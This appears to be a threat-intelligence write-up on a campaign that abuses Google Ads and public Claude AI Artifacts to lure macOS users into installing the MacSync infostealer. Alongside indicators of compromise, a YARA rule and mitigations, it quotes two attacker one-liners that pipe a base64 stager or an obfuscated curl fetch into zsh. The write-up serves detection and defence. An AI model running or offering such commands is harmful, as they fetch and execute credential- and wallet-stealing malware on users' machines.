Malicious Campaign Uses Claude AI Artifacts and Google Ads to Deliver MacSync Infostealer
A sophisticated malvertising campaign abuses Google Ads and public Claude AI Artifacts to trick macOS users into executing terminal commands that install the MacSync infostealer, targeting credentials and hardware crypto wallets.
A newly discovered malvertising campaign is leveraging Google Ads and public Claude AI Artifacts to distribute the MacSync infostealer targeting macOS users. The campaign exploits the inherent trust users place in domains like claude.ai and medium.com to bypass security awareness.
Attack Chain
The attack follows a multi-stage delivery workflow:
- Google Ads Lure - Attackers purchase sponsored search results for common queries like "Homebrew install," "DNS resolver," or "macOS disk analyzer"
- Trusted Domain Redirect - Ads direct victims to public Claude Artifacts or Medium/Evernote pages titled "macOS Secure Command Execution" or similar
- ClickFix Social Engineering - The page provides a convincing technical guide instructing users to paste a command into Terminal
- Payload Execution - The command downloads and executes the MacSync infostealer
Technical Details
The campaign uses two primary command variants to deliver the payload:
Variant 1: Base64 Encoded Stager
The first variant uses base64 encoding to decode a Zsh stager that fetches a remote AppleScript core:
echo "Y3VybCAtayAtcyAtLU1heC1UaW1lIDMwIC1IICJBcGktS2V5OiA1MTkwZWYxNzMzMT..." | base64 -D | zsh
Variant 2: Obfuscated Curl
The second variant uses string concatenation to evade YARA and pattern-matching detection:
true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[token]" | zsh
Crypto Wallet Targeting
If MacSync detects Ledger or Trezor wallet applications, it overwrites the internal app.asar bundle with a trojanized version designed to phish for seed phrases. The malware uses ad-hoc code re-signing to bypass basic Gatekeeper checks.
Indicators of Compromise (IOCs)
| Type | Value | Description |
|---|---|---|
| C2 Domain | a2abotnet[.]com | Primary C2 and exfiltration gate |
| Payload Host | raxelpak[.]com | Hosts malicious loaders |
| Payload Host | jmpbowl[.]xyz | AppleScript payload hosting |
| Staging Path | /tmp/osalogging.zip | Stolen data staging archive |
| SHA-256 | ec6bc84be18ce4cb55fb915370c00f2a836ffefc65c6b728efb8d2d28036e376 | Trojanized Ledger app.asar |
| SHA-256 | c99dea85f0ef8d3e2f3771c8ebd02d7dee0d90efc5c8392e5c266a59640a4206 | Modified Info.plist |
YARA Detection Rule
rule MacSync_Detection {
meta:
description = "Detects MacSync infostealer and staging artifacts"
author = "Security Research"
date = "2026-02-14"
strings:
$s1 = "osalogging.zip" ascii
$s2 = "a2abotnet.com" ascii
$s3 = "GrabFolderLimit" ascii
$s4 = "checkvalid" ascii
$phish = "Enter your system password to continue verification" ascii
condition:
2 of ($s*) or $phish
}
Mitigation
- Never trust terminal commands from public AI artifacts, Medium posts, or sponsored search results
- Block
a2abotnet[.]com,raxelpak[.]com, andjmpbowl[.*]domains at the network level - Monitor for unexpected
osascriptorcurl | zshexecution chains - Verify integrity of hardware wallet applications (Ledger, Trezor) if a suspicious command was executed
- Note that Anthropic and Google may take 12-24 hours to remediate reported malicious links
